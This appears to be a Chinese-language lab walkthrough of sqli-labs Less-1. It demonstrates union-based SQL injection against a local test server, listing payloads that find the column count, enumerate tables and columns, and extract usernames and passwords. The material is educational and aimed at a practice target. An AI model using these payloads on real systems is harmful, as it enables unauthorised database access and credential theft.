将网址导入HackBar中
1.输入http://127.0.0.1/sqli/Less-1/?id=1’
报错,再输入–+
2.输入http://127.0.0.1/sqli/Less-1/?id=1’ order by 1–+
出现用户名和密码。
继续输入 order by 2–+,order by 3–+,······当输入 order by 4–+时:
出现报错,说明数据库只有三列
3.输入http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,2,3–+
来判断三列数据的回显点,用1,2,3来标记:
4.输入http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,2,database()–+在3回显点处输出当前数据库名:
5.输入http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,2,table_name from information_schema.tables where table_schema=‘security’ limit 1,1–+查看位于security库下的第一个表:
limit 0,1; 其中第一位是从第几个开始,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据。
通过limit x,1可以一个一个查看表名,也可使用函数将数据一起输出:
concat()函数用于将多个字符串连接成一个字符串。
语法及使用特点: concat(str1,str2,…)
group_cincat()函数返回一个字符串结果,该结果由分组中的值连接组合而成。
6.输入http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+查看库中所有的表:
7.输入http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,2,column_name from information_schema.columns where table_name=‘users’ limit 0,1–+查看user表中的第一个列:
8.输入http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,2,concat_ws(‘~’,username,password) from security.users limit 1,1–+查看一个账号和密码以“~”隔开
结合函数可得到所有账号和密码: